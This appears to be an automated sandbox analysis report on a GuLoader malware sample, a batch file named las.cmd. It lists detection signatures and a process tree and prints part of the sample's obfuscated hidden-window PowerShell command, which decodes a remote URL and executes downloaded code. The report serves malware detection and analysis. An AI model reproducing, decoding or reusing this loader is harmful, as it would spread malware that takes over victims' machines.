Windows
Analysis Report
las.cmd
Overview
General Information
Detection
GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Creates an undocumented autostart registry key
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Suspicious powershell command line found
Very long command line found
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file contains strange resources
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Classes Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
cmd.exe (PID: 7544 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\las.c md" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 7552 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 7596 cmdline:
powershell .exe -wind owstyle hi dden "$sub license = 1;$Solbatt eri='Sub'; $Solbatter i+='strin' ;$Solbatte ri+='g';Fu nction Udv indende($T wistende){ $Lastelini e=$Twisten de.Length- $sublicens e;For($Fir blok=5;$Fi rblok -lt $Lastelini e;$Firblok +=6){$lune lsen+=$Twi stende.$So lbatteri.I nvoke( $Fi rblok, $su blicense); }$lunelsen ;}function Unschool( $Squimmidg e){. ($J etmotoren) ($Squimmi dge);}$Ped icures=Udv indende 'T estiMMiljl oInterzShe l iMil.elC ol.clBifig aOvers/Ste pp5Ne kw. A er0Ego r Konku(Ind skWin vii. ernin kaks dTrilloByg gewKoreisD u,st O,deb N XenoTPri sl Matem1U nher0 Inla .Pr,fa0Sam me;Ote.t B rnesW ,isc iAureanSen so6Under4g lyce; ihra NotatxSoc i 6 F.ap4T erzi; Honn Gyro.rHou ltv S,ns:s pell1Oli.t 2Indbl1s e nd.Capit0K ratt)C,oic genetGRys teePremac, mudskNonub oDevis/ S or2Misdd0. dgan1Misha 0Stjyd0Vel st1Haa d0 S,ip1.ndig NoradFOr iei nergrS e ereDy.tb fFluoroInd paxSludr/M od.r1spu.r 2 Smut1Ugl ,d.Ingra0S e ue ';$Pr ivileged=U dvindende 'Ob,diUA.d sesMsk,ne ,arar Matr -Jord.AUte rog reeseB e trnTe.ta tDis i ';$ Sprngninge rs=Udvinde nde 'junca h,ripyt Sf yrtsupr.pF a.lesF,rpo :Prunt/Arg um/ D.scwE lskowMumif w hers.Dol lasacidoeS emilnmisle d lyndsImp arpKendea unnic ugea eThist.Dok hacOmnipo ugtim.allw /Curetp O firStipuoG l zi/Gueri d SkablBa st/JogurwI ntralVitr oShirtrSam fuhSlvsmsS k,dk ';$Fo rlovede=Ud vindende ' Rel,a>R,kl a ';$Jetmo toren=Udvi ndende 'Co r,ii Klise Cuchix Kys e ';$Tendr ilous='Han dleformern e';$Veta13 = Udvinde nde 'Skyts eCentrcAll ithUnguio Tu.i ,ndka %mbleraMon ocp IntepF orstd Fili aHikketTeg ,vaya.ne% Ou.w\Cytop FVetere,li kvtSa.tltA .riglMelle eJakob.Tug teHToilfaU n,ernPuebl Folk&Nonp a&L.dar Xx .ndeDeamic RegihInca noRhila Be tint.agua ';Unschool (Udvinden de 'Flo,r$ CyprigLevn elSluk oUn s ib In.la CompulR,ts f:NedgrSov ertaSjofll UdsteuSorb et Druke w aver.uadre snil,r Sam o=Hneky(Yd erzcNain m Compd arg a Helt/Het ercDekup , ylli$Askeb VDusineFlo wetHal,taF ar,e1 Akva 3Tjrne) ak tf ');Unsc hool (Udvi ndende ' U stk$Teh ng Ddssl,nde loSentibRe tiraSaddll Thor:Sacc hFP.erelUd gandNavern SeedeiKphe sn Ove,gGr nsesIndstt UndeiArch ed alkieDi sk,n Ove,s Ratin=Inte r$.tultS S entp Udvir Benzin van tgP rapnKi s.liD,rign posefgSub eeTravbr N onss Mand. GinnsRner epAllesl S mediAktiot Minke( Rej s$antifFJ sovoNer,or W.resl Str ooCheefvNa adseBirdid Tree e Fi. s)Gulds ') ;$Sprngnin gers=$Fldn ingstidens [0];$Unacc idented180 = (Udvinde nde 'Phyll $AffejgSan dwlbolvro K inbL pea aHac,bl Ja gt:LngstBS iolaa Harr sProtoiAll emc Tornh De.mrClass oMell mcut t iForr oK alibl Skrf eC.nce=Rem i NXericeG reenw arry -N.npeOkaj akbUvejsj Zoquebioc, cAlgovt Ro tu .nchSco nvey Geogs